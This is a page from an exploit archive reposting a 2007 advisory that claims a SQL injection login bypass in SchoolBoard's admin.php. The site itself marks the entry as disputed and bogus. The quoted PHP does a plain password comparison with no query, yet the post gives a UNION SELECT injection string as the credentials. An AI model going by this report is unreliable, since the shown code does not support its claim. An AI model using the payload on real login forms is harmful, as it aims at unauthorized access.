WARNING! Fake news / Disputed / BOGUS

SchoolBoard (admin.php) Remote Login Bypass SQL Injection Vulnerability

2007.05.17
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Remote Login Bypass SQL Injection Vulnerability (admin.php) # # AYYILDIZ.ORG Presents. # SchoolBoard [ http://free-php-scripts.net/download.php?id=120 ] # author : iLker Kandemir < ilkerkandemir <at> mynet.com > # Tnx : h0tturk,ekin0x,Dr.Max Virus,Gencnesil,Gencturk,Ajann # Vulnerable; /admin.php -------------------------------------------------//If login in if($_POST['password'] != NULL){ <<<---------------------[+] //do all this: if($_POST['password'] == $ADMIN_PASS){ $_SESSION['is_admin'] = $ADMIN_PASS; } else { $message = 'Invalid Access'; } } //Check password if($_SESSION['is_admin'] != $ADMIN_PASS){$_GET['page'] = 'login';} if($_GET['page'] == NULL){$_GET['page'] = $_POST['page'];} if($_GET['page'] != 'Add' && $_GET['page'] != 'login'){ <<<-------------------[+] // but the user/pass don't match ------------------------------------------------- username : 1/**/union/**/select/**/1,2,3,4/* password : 1/**/union/**/select/**/1,2,3,4/* (ADMIN_PASS) Panel: /admin.php logged.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top